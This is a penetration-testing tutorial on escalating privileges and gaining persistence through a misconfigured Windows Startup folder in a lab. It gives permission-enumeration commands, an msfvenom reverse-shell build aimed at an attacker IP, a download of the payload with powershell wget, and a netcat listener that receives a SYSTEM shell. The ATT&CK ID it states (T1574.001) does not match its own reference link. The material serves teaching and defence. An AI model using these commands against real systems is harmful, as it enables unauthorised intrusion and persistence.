Windows Startup folder may be targeted by an attacker to escalate privileges or persistence attacks. Adding an application to a startup folder or referencing it using a Registry run key are two ways to do this. When a user signs in, the application linked will be executed if an item is in the “run keys” in the Registry or startup folder. These programs will be executed under the perspective of the user and will have the account’s associated permissions level.

Table of Content

Windows Startup Folder

Boot | Logon Autostart Execution (Mitre Attack)

Prerequisite

Lab Setup

Privilege Escalation by Abusing Startup Folder

• Enumerating Assign Permissions using Icacls
• Enumerating Assign Permissions using Accesschk.exe
• Creating Malicious Executable

Windows Startup Folder

The Startup folder was a folder accessible from the Start Menu. Programs saved in this folder would start up immediately once users turned on their machine. There are two locations for the startup folder in windows.

• Startup folder that functions at the system level and is accessible by all user accounts.

The All Users Startup folder is found in the following path:

• C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
• Run dialog box: Windows Key + R), type shell:common startup

• Each user on the system has their own startup folder that executes at the user level.

The Current User Startup folder is located here:

• C:\Users\<User_Name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
• Run dialog box: Windows Key + R), type shell: startup

Boot | Logon Autostart Execution: Startup Folder

Injecting a malicious program within a startup folder will also cause that program to execute when a user logs in, thus it may help an attacker to perform persistence or privilege escalation Attacks from misconfigured startup folder locations.

This technique is the most driven method for persistence used by well know APTs such as APT3, APT33,  APT39 and etc.

Mitre ID: T1574.001

Tactics: Privilege Escalation & Persistence

Platforms: Windows

Prerequisite

Target Machine: Windows 10

Attacker Machine: Kali Linux

Tools: AccessChk.exe

Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.

Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Misconfigured Startup folder.

Lab Setup

Note: Given steups will create a loophole through misconfigured startup folder, thus avoiding such configuration in a production environment.

Step 1: Navigate to the Startup directory using the following path:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Step2: Access the startup folder properties and select the security option. Click on the Edit option to assign dangerous permissions to the Users group.

Step 3: Select Users group on the targeted system and assign Read Write or FULL Control permissions.

Privilege Escalation by Abusing Startup Folder

Enumerating Assign Permissions with Icacls

Attackers can exploit these configuration locations to launch malware, such as RAT, in order to sustain persistence during system reboots.

Following an initial foothold, we can identify permissions using the following command:

icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Enumerating Assign Permissions using Accesschk.exe

The accesschk.exe is Sysinternals tool another permission checker tool.

accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Here Read-write permission is assigned on BUILTIN\Users

Creating Malicious Executable

As we know the current user owns read-write permission for the startup folder thus we can inject RAT to perform persistence or privilege escalation. Let’s create an executable program with the help of msfvenom.

msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe
python –m SimpleHTTPServer 80

Executing Malicious Executable

Start a netcat listener in a new terminal and transfer the shell.exe with the help of the following command

cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
powershell wget 192.168.1.3/shell.exe -o shell.exe
dir

As we know this attack is named as Boot Logon Autostart Execution which means the shell.exe file operates when the system will reboot.

The attacker will get a reverse connection in the new netcat session as NT Authority \System

Reference: https://attack.mitre.org/techniques/T1547/001/

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here